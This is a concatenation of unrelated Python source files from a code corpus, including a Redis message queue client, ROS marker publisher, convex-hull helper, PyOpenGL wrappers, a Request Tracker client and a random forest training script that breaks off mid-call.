                where -- same filtering for aggregate_interval_plays
                    t.is_current is True AND
                    t.is_delete is False AND
                    t.is_unlisted is False AND
                    t.stem_of is Null;
            commit;
            """
        )
        session.execute(
            trending_track_query,
            {
                "week": T["week"],
                "month": T["month"],
                "N": N,
                "F": F,
                "O": O,
                "R": R,
                "i": i,
                "q": q,
                "y": y,
                "type": self.trending_type.name,
                "version": self.version.name,
                "week_time_range": "week",
                "month_time_range": "month",
                "all_time_time_range": "allTime",
            },
        )
        duration = time.time() - start_time
        logger.info(
            f"trending_tracks_strategy | Finished calculating trending scores in {duration} seconds",
            extra={
                "id": "trending_strategy",
                "type": self.trending_type.name,
                "version": self.version.name,
                "duration": duration,
            },
        )

    def get_score_params(self):
        # Opaque tuning parameters consumed elsewhere by the trending pipeline.
        return {"xf": True, "pt": 0, "nm": 5}
| 2.234375 | 2 |
src/rsmq/rsmq.py | ChuckHend/PyRSMQ | 30 | 12760325 | <reponame>ChuckHend/PyRSMQ<filename>src/rsmq/rsmq.py
'''
Python Redis Simple Queue Manager
'''
from redis import Redis
from . import const
from .cmd import ChangeMessageVisibilityCommand
from .cmd import CreateQueueCommand, DeleteQueueCommand, ListQueuesCommand
from .cmd import DeleteMessageCommand
from .cmd import SendMessageCommand, ReceiveMessageCommand, PopMessageCommand
from .cmd import SetQueueAttributesCommand, GetQueueAttributesCommand
# Defaults handed to the lazily-created Redis client (see RedisSMQ.client).
DEFAULT_REDIS_OPTIONS = {
    'encoding': 'utf-8',
    'decode_responses': True
}
# Default RSMQ behaviour: key namespace 'rsmq', realtime pubsub off,
# raise exceptions on errors (toggled via RedisSMQ.exceptions()).
DEFAULT_OPTIONS = {
    'ns': 'rsmq',
    'realtime': False,
    'exceptions': True
}
class RedisSMQ():
    '''
    Redis Simple Message Queue implementation in Python.

    A thin facade over the command classes: every queue/message operation
    builds a command object via :meth:`_command`, merging the per-call
    keyword arguments on top of the defaults captured at construction time.
    The Redis connection and the Lua script SHA1s are created lazily.
    '''

    def __init__(self, client=None, host="127.0.0.1", port="6379", options=None, **kwargs):
        '''
        Constructor:
        @param client: if provided, redis client object to use
        @param host: if client is not provided, redis hostname
        @param port: if client is not provided, redis port
        @param options: if client is not provided, additional options for redis client creation

        Additional arguments:
        @param ns: namespace
        @param realtime: if true, use realtime comms (pubsub)(default is False)
        @param exceptions: if true, throw exceptions on errors, else return False(default is True)

        Remaining params are automatically passed to commands
        '''
        self._client = client

        # Options for the Redis client we may have to create ourselves.
        self.redis_options = dict(DEFAULT_REDIS_OPTIONS, host=host, port=port)
        if options:
            self.redis_options.update(options)

        # Global RSMQ flags: recognised keys are lifted out of **kwargs,
        # and keys whose value is explicitly None are dropped entirely.
        self.options = dict(DEFAULT_OPTIONS)
        consumed = []
        for key, value in kwargs.items():
            if key in self.options:
                self.options[key] = value
                consumed.append(key)
            elif value is None:
                consumed.append(key)
        for key in consumed:
            del kwargs[key]

        # Whatever remains becomes the default parameter set for commands.
        self._default_params = kwargs

        # Lua script SHA1s, loaded into Redis on first access.
        self._popMessageSha1 = None
        self._receiveMessageSha1 = None
        self._changeMessageVisibilitySha1 = None

    @property
    def popMessageSha1(self):
        ''' SHA1 of the pop-message Lua script (loaded lazily). '''
        if self._popMessageSha1 is None:
            self._popMessageSha1 = self.client.script_load(const.SCRIPT_POPMESSAGE)
        return self._popMessageSha1

    @property
    def receiveMessageSha1(self):
        ''' SHA1 of the receive-message Lua script (loaded lazily). '''
        if self._receiveMessageSha1 is None:
            self._receiveMessageSha1 = self.client.script_load(
                const.SCRIPT_RECEIVEMESSAGE)
        return self._receiveMessageSha1

    @property
    def changeMessageVisibilitySha1(self):
        ''' SHA1 of the change-message-visibility Lua script (loaded lazily). '''
        if self._changeMessageVisibilitySha1 is None:
            self._changeMessageVisibilitySha1 = self.client.script_load(
                const.SCRIPT_CHANGEMESSAGEVISIBILITY)
        return self._changeMessageVisibilitySha1

    @property
    def client(self):
        ''' Redis client; created on first access if none was supplied. '''
        if not self._client:
            self._client = Redis(**self.redis_options)
        return self._client

    def exceptions(self, enabled=True):
        ''' Set the global exceptions flag; returns self for chaining. '''
        self.options['exceptions'] = (enabled == True)
        return self

    def setClient(self, client):
        ''' Replace the Redis client; returns self for chaining. '''
        self._client = client
        return self

    def _command(self, command, **kwargs):
        ''' Instantiate ``command`` with the defaults overridden by ``kwargs``. '''
        merged = dict(self._default_params)
        merged.update(kwargs)
        return command(self, **merged)

    def createQueue(self, **kwargs):
        ''' Create a queue '''
        return self._command(CreateQueueCommand, **kwargs)

    def deleteQueue(self, **kwargs):
        ''' Delete a queue '''
        return self._command(DeleteQueueCommand, **kwargs)

    def setQueueAttributes(self, **kwargs):
        ''' Set queue attributes '''
        return self._command(SetQueueAttributesCommand, **kwargs)

    def getQueueAttributes(self, **kwargs):
        ''' Get queue attributes '''
        return self._command(GetQueueAttributesCommand, **kwargs)

    def listQueues(self, **kwargs):
        ''' List queues '''
        return self._command(ListQueuesCommand, **kwargs)

    def changeMessageVisibility(self, **kwargs):
        ''' Change a message's visibility timer '''
        return self._command(ChangeMessageVisibilityCommand, **kwargs)

    def sendMessage(self, **kwargs):
        ''' Send a message '''
        return self._command(SendMessageCommand, **kwargs)

    def receiveMessage(self, **kwargs):
        ''' Receive a message '''
        return self._command(ReceiveMessageCommand, **kwargs)

    def popMessage(self, **kwargs):
        ''' Pop a message '''
        return self._command(PopMessageCommand, **kwargs)

    def deleteMessage(self, **kwargs):
        ''' Delete a message '''
        return self._command(DeleteMessageCommand, **kwargs)

    def quit(self):
        ''' Quit - here for compatibility purposes '''
        self._client = None
| 2.265625 | 2 |
mud/migrations/0020_remove_users_loggedin.py | cspt2-build-week-abr/Backend | 0 | 12760326 | # Generated by Django 2.2.3 on 2019-07-22 02:31
from django.db import migrations
class Migration(migrations.Migration):
    # Auto-generated Django migration: removes the ``loggedIn`` field from
    # the ``users`` model, reverting what migration 0019 added.

    dependencies = [
        ('mud', '0019_users_loggedin'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='users',
            name='loggedIn',
        ),
    ]
| 1.453125 | 1 |
bw_default_backend/calculation_package.py | brightway-lca/bw_default_backend | 0 | 12760327 | <reponame>brightway-lca/bw_default_backend
from . import config, Collection, Method, Flow
from .errors import MissingFlow
from peewee import DoesNotExist
import json
def prepare_calculation_package(functional_unit, methods=None, as_file=False, **kwargs):
    """Prepare calculation package for use in `bw_calc`.

    The format for calculation packages is specified in more detail in the documentation.

    Args:
        functional_unit: A dictionary defining the functional unit of
            calculation. Keys can be either ``Flow`` instances or integer ids;
            values should be the amount of the respective flow.
        methods: An optional list of methods (either ``Method`` instances or
            integer ids)
        as_file: Boolean to return package as a JSON filepath instead of a dict
        kwargs: Any additional arguments to add, such as RNG seed

    Returns:
        Either a Python dict, or a JSON filepath (if ``as_file``).

    Raises:
        MissingFlow: The given functional unit is missing in this database
        ValueError: Can't understand given functional unit
    """
    # BUGFIX: this was ``as_id = {x.id if isinstance(x, Flow) else x}`` --
    # a set literal over an undefined name ``x`` -- which was then *called*
    # below, guaranteeing a runtime error. It was clearly meant to be a
    # Flow-or-integer-id normaliser, so make it one.
    def _as_id(obj):
        # Normalise a Flow instance or an integer id to an integer id.
        return obj.id if isinstance(obj, Flow) else obj

    fu = {_as_id(key): value for key, value in functional_unit.items()}
    if not all(isinstance(x, int) for x in fu):
        raise ValueError("Can't understand functional unit")

    try:
        # Union of every collection (recursively) depended on by the
        # demanded flows' own collections.
        collections = set.union(
            *[Flow.get(id=key).collection.recursive_dependents() for key in fu]
        )
    except DoesNotExist as err:
        raise MissingFlow(
            "One or more flows in the functional unit aren't present in the database"
        ) from err
    # NOTE(review): the function ends here even though the docstring promises
    # a dict / JSON filepath; ``methods``, ``as_file``, ``kwargs`` and
    # ``collections`` are currently unused -- the upstream source appears
    # truncated. Behaviour (implicit None return) is preserved.
| 2.65625 | 3 |
uuv_simulator/uuv_control/uuv_control_utils/scripts/trajectory_marker_publisher.py | laughlinbarker/underice_ekf | 1 | 12760328 | #!/usr/bin/env python
# Copyright (c) 2016 The UUV Simulator Authors.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import rospy
import os
import yaml
from datetime import datetime
from std_msgs.msg import Bool
from nav_msgs.msg import Path
from visualization_msgs.msg import MarkerArray, Marker
from geometry_msgs.msg import PoseStamped, Point, Quaternion
from uuv_control_msgs.msg import Trajectory, TrajectoryPoint, WaypointSet
import uuv_trajectory_generator
class TrajectoryMarkerPublisher:
    """Republish received trajectories and waypoint sets as RViz markers.

    Subscribes to the controller's trajectory/waypoint topics and its three
    mode-flag topics, and periodically publishes the corresponding ``Path``
    and ``MarkerArray`` visual markers on a 0.5 s timer.
    """

    def __init__(self):
        self._trajectory_sub = rospy.Subscriber(
            'trajectory', Trajectory, self._update_trajectory)
        self._waypoints_sub = rospy.Subscriber(
            'waypoints', WaypointSet, self._update_waypoints)

        # Vehicle state flags (mirrors of the controller's mode topics)
        self._is_auto_on = False
        self._is_traj_tracking_on = False
        self._is_station_keeping_on = False

        self._automatic_mode_sub = rospy.Subscriber(
            'automatic_on', Bool, self._update_auto_mode)
        self._traj_tracking_mode_sub = rospy.Subscriber(
            'trajectory_tracking_on', Bool, self._update_traj_tracking_mode)
        self._station_keeping_mode_sub = rospy.Subscriber(
            'station_keeping_on', Bool, self._update_station_keeping_mode)

        # Waypoint set received (uuv_trajectory_generator.WaypointSet or None)
        self._waypoints = None
        # Trajectory message received (uuv_control_msgs/Trajectory or None)
        self._trajectory = None

        self._output_dir = None
        if rospy.has_param('~output_dir'):
            self._output_dir = rospy.get_param('~output_dir')
            if not os.path.isdir(self._output_dir):
                # BUGFIX: this line was a Python 2 ``print`` *statement*,
                # which is a syntax error under Python 3.
                print('Invalid output directory, not saving the files, dir=%s' % self._output_dir)
                self._output_dir = None
            else:
                self._output_dir = os.path.join(self._output_dir, rospy.get_namespace().replace('/', ''))
                if not os.path.isdir(self._output_dir):
                    os.makedirs(self._output_dir)

        # Visual marker publishers
        self._trajectory_path_pub = rospy.Publisher(
            'trajectory_marker', Path, queue_size=1)
        self._waypoint_markers_pub = rospy.Publisher(
            'waypoint_markers', MarkerArray, queue_size=1)
        self._waypoint_path_pub = rospy.Publisher(
            'waypoint_path_marker', Path, queue_size=1)

        self._update_markers_timer = rospy.Timer(
            rospy.Duration(0.5), self._update_markers)

    def _update_markers(self, event):
        """Timer callback: publish the waypoint and trajectory markers."""
        if self._waypoints is None:
            # No waypoints yet: publish an empty path plus a clearing marker
            # (action 3 is Marker.DELETEALL) so stale markers leave RViz.
            waypoint_path_marker = Path()
            t = rospy.Time.now()
            waypoint_path_marker.header.stamp = t
            waypoint_path_marker.header.frame_id = 'world'
            waypoint_marker = MarkerArray()
            marker = Marker()
            marker.header.stamp = t
            marker.header.frame_id = 'world'
            marker.id = 0
            marker.type = Marker.SPHERE
            marker.action = 3
            # BUGFIX: the clearing marker was constructed but never added to
            # the array, so an empty MarkerArray was published instead.
            waypoint_marker.markers.append(marker)
        else:
            waypoint_path_marker = self._waypoints.to_path_marker()
            waypoint_marker = self._waypoints.to_marker_list()

        self._waypoint_path_pub.publish(waypoint_path_marker)
        self._waypoint_markers_pub.publish(waypoint_marker)

        traj_marker = Path()
        traj_marker.header.stamp = rospy.Time.now()
        traj_marker.header.frame_id = 'world'
        if self._trajectory is not None:
            # Convert each trajectory point into a stamped pose for the path.
            for pnt in self._trajectory.points:
                p_msg = PoseStamped()
                p_msg.header.stamp = pnt.header.stamp
                p_msg.pose = pnt.pose
                traj_marker.poses.append(p_msg)
        self._trajectory_path_pub.publish(traj_marker)
        return True

    def _update_trajectory(self, msg):
        """Store the latest trajectory message."""
        self._trajectory = msg

    def _update_waypoints(self, msg):
        """Convert and store the latest waypoint set message."""
        self._waypoints = uuv_trajectory_generator.WaypointSet()
        self._waypoints.from_message(msg)

    def _update_auto_mode(self, msg):
        """Track the automatic-mode flag."""
        self._is_auto_on = msg.data

    def _update_station_keeping_mode(self, msg):
        """Track the station-keeping flag."""
        self._is_station_keeping_on = msg.data

    def _update_traj_tracking_mode(self, msg):
        """Track the trajectory-tracking flag."""
        self._is_traj_tracking_on = msg.data
if __name__ == '__main__':
    # Entry point: run the marker publisher node until ROS shuts down.
    print('Starting trajectory and waypoint marker publisher')
    rospy.init_node('trajectory_marker_publisher')

    try:
        node = TrajectoryMarkerPublisher()
        rospy.spin()
    except rospy.ROSInterruptException:
        print('caught exception')
    print('exiting')
| 1.898438 | 2 |
interactive_map_tester/interactive_map_tester/pointGroup.py | antonikaras/thesis_ros2 | 1 | 12760329 | # Python related libraries
import numpy as np
import random
# ROS2 msgs
from autonomous_exploration_msgs.msg import PointGroup
class PointsGroup:
    """
    Class similar to the one used in unity, created
    to handle each area in the interactive map.

    Stores the map metadata and the 2D positions of one interactive area,
    and (when there are more than 3 points) a convex hull built with a
    gift-wrapping style algorithm so point-in-area queries can be answered
    via InConvexHull().
    """

    # NOTE: annotation kept as a string so the class can be defined without
    # the PointGroup message type being importable.
    def __init__(self, pG: "PointGroup") -> None:
        # Store the map related data
        self.mapOrigin = pG.map_origin
        self.mapDims = pG.map_dims
        self.mapResolution = pG.map_resolution
        self.associated_file = pG.associated_file

        # Store the group related data
        self.groupID = pG.group_id
        # map_pos is a flat [x0, y0, x1, y1, ...] array.
        self.numOfPoints = int(0.5 * len(pG.map_pos))

        self.mapPos = np.zeros([self.numOfPoints, 2])
        for i in range(self.numOfPoints):
            self.mapPos[i, 0] = pG.map_pos[2 * i]
            self.mapPos[i, 1] = pG.map_pos[2 * i + 1]

        # Generate the convex hull only when there are enough points.
        self.convexHullPoints = []
        if self.numOfPoints > 3:
            self.GenerateConvexHull()

    def GenerateConvexHull(self) -> None:
        """
        Generate the convex hull using the points of the interactive area.
        Gift-wrapping (Jarvis-march style) algorithm, same as the unity package.
        """
        vertices = list(self.mapPos.copy())
        vertices = [list(tmp) for tmp in vertices]

        # Step 1: Find the vertex with the smallest x coordinate
        startPos = vertices[0]
        for vert in vertices:
            if vert[0] < startPos[0]:
                startPos = vert

        self.convexHullPoints.append(startPos)
        vertices.remove(startPos)

        # Step 2: Loop to generate the convex hull
        currPos = self.convexHullPoints[0]
        cnt = 0
        while True:
            # After 2 iterations we have to add the start position again so
            # we can terminate the algorithm
            if cnt == 2:
                vertices.append(self.convexHullPoints[0])

            # Check if there are no more points
            if len(vertices) == 0:
                break

            # BUGFIX: hull points are never removed from ``vertices``, so the
            # random pick could select the current position itself; all cross
            # products then evaluate to zero and a duplicated hull vertex was
            # appended. Exclude the current position from the candidates.
            candidates = [vert for vert in vertices if vert != currPos]
            if len(candidates) == 0:
                break
            nextPos = candidates[random.randint(0, len(candidates) - 1)]

            a = currPos
            b = nextPos

            # Check if there's a point to the left of ab, if so then it's the new b
            for vert in vertices:
                # Skip the randomly picked point and the current position
                if vert == nextPos or vert == currPos:
                    continue

                # To the left = better point, so pick it as next point on the convex hull
                if self.CompareLinePoint(a, b, vert) > 0:
                    nextPos = vert
                    b = vert

            # Update the convexHull
            self.convexHullPoints.append(nextPos)
            currPos = nextPos

            # Check if we found again the first point of the convexhull
            if currPos == self.convexHullPoints[0]:
                del self.convexHullPoints[-1]
                break

            cnt += 1

    @staticmethod
    def CompareLinePoint(a: list, b: list, c: list) -> float:
        """Return the position of point ``c`` relative to the line a->b."""
        # Where is c in relation to a-b ?
        # < 0 -> to the right
        # = 0 -> on the line
        # > 0 -> to the left
        relation = (a[0] - c[0]) * (b[1] - c[1]) - (b[0] - c[0]) * (a[1] - c[1])
        return relation

    def InConvexHull(self, c: list) -> bool:
        """Check if map point ``c`` (as [x, y]) lies inside the convex hull."""
        # BUGFIX: guard on the hull itself rather than numOfPoints. The hull
        # is only generated when numOfPoints > 3, so a group with exactly 3
        # points passed the old check (numOfPoints < 3) and then crashed with
        # an IndexError on convexHullPoints[-1] (empty hull).
        if len(self.convexHullPoints) < 3:
            return False

        inConvexHull = True
        # If the point is to the left of any hull segment it is outside
        # (the generated hull is traversed clockwise).
        for i in range(len(self.convexHullPoints) - 1):
            a = self.convexHullPoints[i]
            b = self.convexHullPoints[i + 1]
            if self.CompareLinePoint(a, b, c) > 0:
                inConvexHull = False
                break

        # Check the closing segment (last hull point back to the first).
        if inConvexHull:
            a = self.convexHullPoints[-1]
            b = self.convexHullPoints[0]
            if self.CompareLinePoint(a, b, c) > 0:
                inConvexHull = False

        return inConvexHull
| 3.359375 | 3 |
OpenGLWrapper_JE/venv/Lib/site-packages/OpenGL/GL/EXT/separate_shader_objects.py | JE-Chen/je_old_repo | 0 | 12760330 | '''OpenGL extension EXT.separate_shader_objects
This module customises the behaviour of the
OpenGL.raw.GL.EXT.separate_shader_objects to provide a more
Python-friendly API
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/EXT/separate_shader_objects.txt
'''
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.EXT.separate_shader_objects import *
from OpenGL.raw.GL.EXT.separate_shader_objects import _EXTENSION_NAME
def glInitSeparateShaderObjectsEXT():
    '''Return True when the EXT_separate_shader_objects extension is available.'''
    from OpenGL import extensions as _extensions
    return _extensions.hasGLExtension(_EXTENSION_NAME)
# Autogenerated wrapper section: each statement attaches array-size metadata
# to the raw entry point so PyOpenGL can marshal the array arguments; sizes
# marked "not checked" depend on the runtime ``count`` argument.
# INPUT glCreateShaderProgramvEXT.strings size not checked against count
glCreateShaderProgramvEXT=wrapper.wrapper(glCreateShaderProgramvEXT).setInputArraySize(
    'strings', None
)
# INPUT glDeleteProgramPipelinesEXT.pipelines size not checked against n
glDeleteProgramPipelinesEXT=wrapper.wrapper(glDeleteProgramPipelinesEXT).setInputArraySize(
    'pipelines', None
)
# INPUT glGenProgramPipelinesEXT.pipelines size not checked against n
glGenProgramPipelinesEXT=wrapper.wrapper(glGenProgramPipelinesEXT).setInputArraySize(
    'pipelines', None
)
# INPUT glGetProgramPipelineInfoLogEXT.infoLog size not checked against bufSize
glGetProgramPipelineInfoLogEXT=wrapper.wrapper(glGetProgramPipelineInfoLogEXT).setInputArraySize(
    'infoLog', None
).setInputArraySize(
    'length', 1
)
# INPUT glProgramUniform1fvEXT.value size not checked against count
glProgramUniform1fvEXT=wrapper.wrapper(glProgramUniform1fvEXT).setInputArraySize(
    'value', None
)
# INPUT glProgramUniform1ivEXT.value size not checked against count
glProgramUniform1ivEXT=wrapper.wrapper(glProgramUniform1ivEXT).setInputArraySize(
    'value', None
)
# INPUT glProgramUniform2fvEXT.value size not checked against count*2
glProgramUniform2fvEXT=wrapper.wrapper(glProgramUniform2fvEXT).setInputArraySize(
    'value', None
)
# INPUT glProgramUniform2ivEXT.value size not checked against count*2
glProgramUniform2ivEXT=wrapper.wrapper(glProgramUniform2ivEXT).setInputArraySize(
    'value', None
)
# INPUT glProgramUniform3fvEXT.value size not checked against count*3
glProgramUniform3fvEXT=wrapper.wrapper(glProgramUniform3fvEXT).setInputArraySize(
    'value', None
)
# INPUT glProgramUniform3ivEXT.value size not checked against count*3
glProgramUniform3ivEXT=wrapper.wrapper(glProgramUniform3ivEXT).setInputArraySize(
    'value', None
)
# INPUT glProgramUniform4fvEXT.value size not checked against count*4
glProgramUniform4fvEXT=wrapper.wrapper(glProgramUniform4fvEXT).setInputArraySize(
    'value', None
)
# INPUT glProgramUniform4ivEXT.value size not checked against count*4
glProgramUniform4ivEXT=wrapper.wrapper(glProgramUniform4ivEXT).setInputArraySize(
    'value', None
)
# INPUT glProgramUniformMatrix2fvEXT.value size not checked against count*4
glProgramUniformMatrix2fvEXT=wrapper.wrapper(glProgramUniformMatrix2fvEXT).setInputArraySize(
    'value', None
)
# INPUT glProgramUniformMatrix3fvEXT.value size not checked against count*9
glProgramUniformMatrix3fvEXT=wrapper.wrapper(glProgramUniformMatrix3fvEXT).setInputArraySize(
    'value', None
)
# INPUT glProgramUniformMatrix4fvEXT.value size not checked against count*16
glProgramUniformMatrix4fvEXT=wrapper.wrapper(glProgramUniformMatrix4fvEXT).setInputArraySize(
    'value', None
)
# INPUT glProgramUniform1uivEXT.value size not checked against count
glProgramUniform1uivEXT=wrapper.wrapper(glProgramUniform1uivEXT).setInputArraySize(
    'value', None
)
# INPUT glProgramUniform2uivEXT.value size not checked against count*2
glProgramUniform2uivEXT=wrapper.wrapper(glProgramUniform2uivEXT).setInputArraySize(
    'value', None
)
# INPUT glProgramUniform3uivEXT.value size not checked against count*3
glProgramUniform3uivEXT=wrapper.wrapper(glProgramUniform3uivEXT).setInputArraySize(
    'value', None
)
# INPUT glProgramUniform4uivEXT.value size not checked against count*4
glProgramUniform4uivEXT=wrapper.wrapper(glProgramUniform4uivEXT).setInputArraySize(
    'value', None
)
# NOTE(review): glProgramUniformMatrix4fvEXT is wrapped a second time here
# (already wrapped above), so the wrapper wraps its own wrapper. Looks like a
# generator artifact -- kept as-is since the section is autogenerated.
# INPUT glProgramUniformMatrix4fvEXT.value size not checked against count*16
glProgramUniformMatrix4fvEXT=wrapper.wrapper(glProgramUniformMatrix4fvEXT).setInputArraySize(
    'value', None
)
# INPUT glProgramUniformMatrix2x3fvEXT.value size not checked against count*6
glProgramUniformMatrix2x3fvEXT=wrapper.wrapper(glProgramUniformMatrix2x3fvEXT).setInputArraySize(
    'value', None
)
# INPUT glProgramUniformMatrix3x2fvEXT.value size not checked against count*6
glProgramUniformMatrix3x2fvEXT=wrapper.wrapper(glProgramUniformMatrix3x2fvEXT).setInputArraySize(
    'value', None
)
# INPUT glProgramUniformMatrix2x4fvEXT.value size not checked against count*8
glProgramUniformMatrix2x4fvEXT=wrapper.wrapper(glProgramUniformMatrix2x4fvEXT).setInputArraySize(
    'value', None
)
# INPUT glProgramUniformMatrix4x2fvEXT.value size not checked against count*8
glProgramUniformMatrix4x2fvEXT=wrapper.wrapper(glProgramUniformMatrix4x2fvEXT).setInputArraySize(
    'value', None
)
# INPUT glProgramUniformMatrix3x4fvEXT.value size not checked against count*12
glProgramUniformMatrix3x4fvEXT=wrapper.wrapper(glProgramUniformMatrix3x4fvEXT).setInputArraySize(
    'value', None
)
# INPUT glProgramUniformMatrix4x3fvEXT.value size not checked against count*12
glProgramUniformMatrix4x3fvEXT=wrapper.wrapper(glProgramUniformMatrix4x3fvEXT).setInputArraySize(
    'value', None
)
### END AUTOGENERATED SECTION
src/the_difference_between_two_sorted_arrays.py | seekplum/leetcode | 0 | 12760331 | # -*- coding: utf-8 -*-
"""
#=============================================================================
# ProjectName: leetcode
# FileName: the_difference_between_two_sorted_arrays
# Desc: 给定两个大小为 m 和 n 的有序数组 nums1 和 nums2
# 请找出这 存在nums1数组中,但是不存在nums2数组中的所有数字,要求算法的时间复杂度为 O(log (m+n))
# 示例 1:
# nums1 = [1, 3]
# nums2 = [2, 3]
# 结果是 [1]
# Author: seekplum
# Email: <EMAIL>
# HomePage: seekplum.github.io
# Create: 2019-04-26 19:03
#=============================================================================
"""
# def check(num, pos):
# return 1 if num >= b[pos] else 0
#
#
# # l = 0
# # r = len(b)
# def divide(l, r, num):
# while l <= r:
# mid = (l + r) / 2
# result = check(num, mid)
# if result == 1:
# r = mid - 1
# elif result == 0:
# l = mid + 1
#
# return num == b[l]
def divide(nums1, nums2):
    """Return, in order, every element of ``nums1`` with no match in ``nums2``.

    Both inputs must be sorted ascending. A two-pointer sweep keeps the cost
    at O(m + n); each value in ``nums2`` can cancel at most one occurrence
    in ``nums1``.
    """
    missing = []
    i = j = 0
    size1, size2 = len(nums1), len(nums2)
    while i < size1 and j < size2:
        left, right = nums1[i], nums2[j]
        if left == right:
            i += 1
            j += 1
        elif left < right:
            missing.append(left)
            i += 1
        else:
            j += 1
    # Anything left over in nums1 has no counterpart in nums2.
    missing.extend(nums1[i:])
    return missing
| 3.53125 | 4 |
hostel/tracker/models.py | phylocko/hostel | 0 | 12760332 | <gh_stars>0
import rt
from rt import AuthorizationError, APISyntaxError
from hostel.settings import RT_URL, RT_QUEUE, RT_USER, RT_PASS
class Singleton(type):
    """Metaclass caching one instance per class.

    The first construction wins; constructor arguments of later calls are
    ignored and the cached instance is returned.
    """

    _instances = {}

    def __call__(cls, *args, **kwargs):
        try:
            return cls._instances[cls]
        except KeyError:
            instance = super().__call__(*args, **kwargs)
            cls._instances[cls] = instance
            return instance
class Rt(metaclass=Singleton):
    """Process-wide (singleton) connection to the Request Tracker instance."""

    APISyntaxError = APISyntaxError

    class LoginError(Exception):
        """Raised when RT login keeps failing after several attempts."""
        pass

    def __init__(self):
        print('Initializing RT...')
        self.tracker = rt.Rt(RT_URL, RT_USER, RT_PASS)
        self.login()

    def login(self):
        """Log in, retrying up to three times before raising LoginError."""
        for _attempt in range(3):
            if self.tracker.login():
                return
        raise self.LoginError('Unable to login RT after 3 attempts')

    def create_ticket(self, **kwargs):
        """Create a ticket, defaulting Queue when missing or falsy."""
        if not kwargs.get('Queue'):
            kwargs['Queue'] = RT_QUEUE
        return self.action_with_relogin(self.tracker.create_ticket, **kwargs)

    def edit_ticket(self, ticket_id, **kwargs):
        """Edit an existing ticket."""
        self.action_with_relogin(self.tracker.edit_ticket, ticket_id, **kwargs)

    def reply(self, ticket_id, **kwargs):
        """Reply on a ticket."""
        self.action_with_relogin(self.tracker.reply, ticket_id, **kwargs)

    def comment(self, ticket_id, **kwargs):
        """Comment on a ticket."""
        self.action_with_relogin(self.tracker.comment, ticket_id, **kwargs)

    def edit_link(self, ticket_id, link_type, parent_id):
        """Edit a link between tickets."""
        self.action_with_relogin(self.tracker.edit_link, ticket_id, link_type, parent_id)

    def action_with_relogin(self, action, *args, **kwargs):
        """Run ``action``; on an authorization failure, re-login and retry once."""
        for already_retried in (False, True):
            try:
                return action(*args, **kwargs)
            except AuthorizationError:
                if already_retried:
                    raise
                self.login()
| 2.015625 | 2 |
sk_classification_RandomForest/random_forest_classifier.py | AccessibleAI/ailibrary | 5 | 12760333 | """
All rights reserved to cnvrg.io
http://www.cnvrg.io
cnvrg.io - AI library
Written by: <NAME>
Last update: Oct 06, 2019
Updated by: <NAME>
random_forest_classifier.py
==============================================================================
"""
import argparse
import pandas as pd
from SKTrainer import *
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split
def _cast_types(args):
"""
This method performs casting to all types of inputs passed via cmd.
:param args: argparse.ArgumentParser object.
:return: argparse.ArgumentParser object.
"""
args.x_val = None if args.x_val == 'None' else int(args.x_val)
args.test_size = float(args.test_size)
args.n_estimators = int(args.n_estimators)
args.max_depth = None if args.max_depth == 'None' else int(args.max_depth)
# min_samples_split.
try:
args.min_samples_split = int(args.min_samples_split)
except ValueError:
args.min_samples_split = float(args.min_samples_split)
# min_samples_leaf.
try:
args.min_samples_leaf = int(args.min_samples_leaf)
except ValueError:
args.min_samples_leaf = float(args.min_samples_leaf)
args.min_weight_fraction_leaf = float(args.min_weight_fraction_leaf)
# max_features.
if args.max_features in ["auto", "sqrt", "log2"]:
pass
elif args.max_features == "None" or args.max_features == 'None':
args.max_features = None
else:
try:
args.max_features = float(args.max_features)
except ValueError:
args.max_features = int(args.max_features)
args.max_leaf_nodes = None if args.max_leaf_nodes == 'None' else int(args.max_leaf_nodes)
args.min_impurity_decrease = float(args.min_impurity_decrease)
args.min_impurity_split = None if args.min_impurity_split == 'None' else float(args.min_impurity_split)
args.bootstrap = (args.bootstrap in ['True', "True", 'true', "true"])
args.oob_score = (args.oob_score in ['True', "True", 'true', "true"])
args.n_jobs = None if args.n_jobs == 'None' else int(args.n_jobs)
args.random_state = None if args.random_state == 'None' else int(args.random_state)
args.verbose = int(args.verbose)
args.warm_start = (args.warm_start in ['True', "True", 'true', "true"])
# class_weight. (problematic)
if args.class_weight == "None" or args.class_weight == 'None':
args.class_weight = None
else:
args.class_weight = dict(args.class_weight)
# --- ---------------------------------------- --- #
return args
def main(args):
    """Train a RandomForestClassifier on the given csv and hand it to SKTrainer.

    The last column of the csv is taken as the label column, the rest as
    features. ``args`` is the raw argparse namespace (string values), cast
    in place via ``_cast_types``.
    """
    args = _cast_types(args)

    # Minimal number of rows and columns in the csv file.
    MINIMAL_NUM_OF_ROWS = 10
    MINIMAL_NUM_OF_COLUMNS = 2

    # Loading data, and splitting it to train and test based on user input
    data = pd.read_csv(args.data, index_col=0)

    # Check for unfit given dataset and splitting to X and y.
    rows_num, cols_num = data.shape
    if rows_num < MINIMAL_NUM_OF_ROWS:
        raise ValueError("LibraryError: The given csv doesn't have enough rows (at least 10 examples must be given).")
    if cols_num < MINIMAL_NUM_OF_COLUMNS:
        raise ValueError("DatasetError: Not enough columns in the csv (at least 2 columns must be given).")

    # Split to X and y (train & test).
    X = data.iloc[:, :-1]
    y = data.iloc[:, -1]
    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=args.test_size)

    # Model initialization.
    model = RandomForestClassifier(
        n_estimators=args.n_estimators,
        criterion=args.criterion,
        max_depth=args.max_depth,
        min_samples_split=args.min_samples_split,
        min_samples_leaf=args.min_samples_leaf,
        min_weight_fraction_leaf=args.min_weight_fraction_leaf,
        max_features=args.max_features,
        max_leaf_nodes=args.max_leaf_nodes,
        min_impurity_decrease=args.min_impurity_decrease,
        min_impurity_split=args.min_impurity_split,
        bootstrap=args.bootstrap,
        oob_score=args.oob_score,
        n_jobs=args.n_jobs,
        random_state=args.random_state,
        verbose=args.verbose,
